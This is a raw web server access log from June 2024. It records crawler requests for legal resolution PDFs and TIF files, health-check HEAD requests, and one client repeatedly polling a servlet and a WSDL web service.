216.244.66.195 - - [29/Jun/2024:03:49:06 -0500] "GET /BLA/resoluciones/AUTOS%202023/1631.pdf HTTP/1.1" 200 4423143
66.249.66.13 - - [29/Jun/2024:03:49:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0497.pdf HTTP/1.1" 200 356934
201.245.192.253 - - [29/Jun/2024:03:49:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:03:49:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [29/Jun/2024:03:50:00 -0500] "GET /BLA/resoluciones/AUTOS%202023/1829.pdf HTTP/1.1" 200 765228
52.167.144.221 - - [29/Jun/2024:03:50:08 -0500] "GET /BLA/resoluciones/AUTOS%202022/1749.pdf HTTP/1.1" 304 -
172.22.2.4 - - [29/Jun/2024:03:48:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.12 - - [29/Jun/2024:03:50:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4113.pdf HTTP/1.1" 200 359989
216.244.66.195 - - [29/Jun/2024:03:50:50 -0500] "GET /BLA/resoluciones/AUTOS%202023/3265.pdf HTTP/1.1" 200 1191567
172.22.2.4 - - [29/Jun/2024:03:50:57 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
66.249.66.12 - - [29/Jun/2024:03:50:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201001-1050/2002RES1034.tif HTTP/1.1" 200 80112
201.245.192.253 - - [29/Jun/2024:03:50:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:03:49:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54300
201.245.192.253 - - [29/Jun/2024:03:51:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.12 - - [29/Jun/2024:03:51:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/05162.pdf HTTP/1.1" 200 460664
216.244.66.195 - - [29/Jun/2024:03:51:40 -0500] "GET /BLA/resoluciones/AUTOS%202023/3775.pdf HTTP/1.1" 200 385539
66.249.66.13 - - [29/Jun/2024:03:51:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201401-1450/20021430.tif HTTP/1.1" 200 124320
216.245.221.92 - - [29/Jun/2024:03:51:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:03:51:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:03:51:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [29/Jun/2024:03:52:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0183.pdf HTTP/1.1" 200 1266348
66.249.66.13 - - [29/Jun/2024:03:52:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1457.pdf HTTP/1.1" 200 360805
172.22.2.4 - - [29/Jun/2024:03:50:59 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 61093
201.245.192.253 - - [29/Jun/2024:03:52:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [29/Jun/2024:03:53:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0829.pdf HTTP/1.1" 200 374004
66.249.66.11 - - [29/Jun/2024:03:53:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0841.pdf HTTP/1.1" 200 380956
216.244.66.195 - - [29/Jun/2024:03:53:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0843.pdf HTTP/1.1" 200 233089
201.245.192.253 - - [29/Jun/2024:03:53:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:03:53:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [29/Jun/2024:03:54:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0936.pdf HTTP/1.1" 200 258259
66.249.66.13 - - [29/Jun/2024:03:54:40 -0500] "GET /BLA/resoluciones/AUTOS%202023/1273.pdf HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:03:54:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [29/Jun/2024:03:55:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1303.pdf HTTP/1.1" 200 419038
66.249.66.12 - - [29/Jun/2024:03:55:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5254.pdf HTTP/1.1" 200 539832
201.245.192.253 - - [29/Jun/2024:03:55:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [29/Jun/2024:03:55:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1981.pdf HTTP/1.1" 200 308572
201.245.192.253 - - [29/Jun/2024:03:55:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:03:54:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.11 - - [29/Jun/2024:03:56:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20501-550/00000533.tif HTTP/1.1" 200 92070
201.245.192.253 - - [29/Jun/2024:03:56:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.244.66.195 - - [29/Jun/2024:03:56:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0179.pdf HTTP/1.1" 200 286665
66.249.66.11 - - [29/Jun/2024:03:56:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2569.pdf HTTP/1.1" 200 346676
216.245.221.92 - - [29/Jun/2024:03:56:51 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.24 - - [29/Jun/2024:03:56:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/1076.pdf HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:03:56:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:03:55:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56191
216.244.66.195 - - [29/Jun/2024:03:57:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0581.pdf HTTP/1.1" 200 291295
66.249.66.11 - - [29/Jun/2024:03:57:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0437.pdf HTTP/1.1" 200 329043
